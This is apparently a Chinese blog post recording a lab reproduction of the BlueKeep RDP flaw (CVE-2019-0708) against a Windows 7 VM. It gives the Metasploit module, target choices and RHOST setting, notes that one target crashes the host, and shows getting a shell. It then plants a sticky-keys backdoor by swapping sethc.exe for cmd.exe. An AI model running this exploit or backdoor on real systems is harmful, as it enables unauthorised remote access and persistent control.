#禁止右键复制模块,去掉下面的/*注释可使用#

CVE-2019-0708远程桌面代码漏洞复现

环境配置

Win2007sp1 ip:192.168.171.136

Kali2021.02 ip:192.168.171.129

Win2007sp1 开启3389端口关闭防火墙

靶机和攻击机能够相互ping通

3 漏洞复现

Kali终端打开msf,并搜索cve-2019-0708或者bulekeep

 

然后

use 1或者use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

Show target

选择target 3

 

选择攻击的IP地址set rhost ip,这里是192.168.171.136

 

Win2007出现蓝屏,过后系统记录dump诊断文件并自动重启

 

若想拿到shell,在show target里再选择一次target 4即可,run后

 

拿到目标主机后whoami查看该系统,并在c系统盘创建text文件夹

 

 

 

 

返回win7查看确实创建了text文件夹

 

下面是进一步利用sechc.exe与cmd.exe互换功能,使其按五次shift后弹出cmd过程

 

直接改名会提示没有权限,如下图进入属性,高级,更改所有者,后回到安全,添加想给的用户权限即可。

 

 

完成后删除sethc.后面cmd添加权限同理即可。最后将cmd命名为sethc即偷梁换柱成功。

 

 

Kali里面重新远程连接后,按五次shift即可弹出cmd.

 

posted @ 2022-06-16 17:41  Hndreamer  阅读(115)  评论(0编辑  收藏  举报
#百度统计#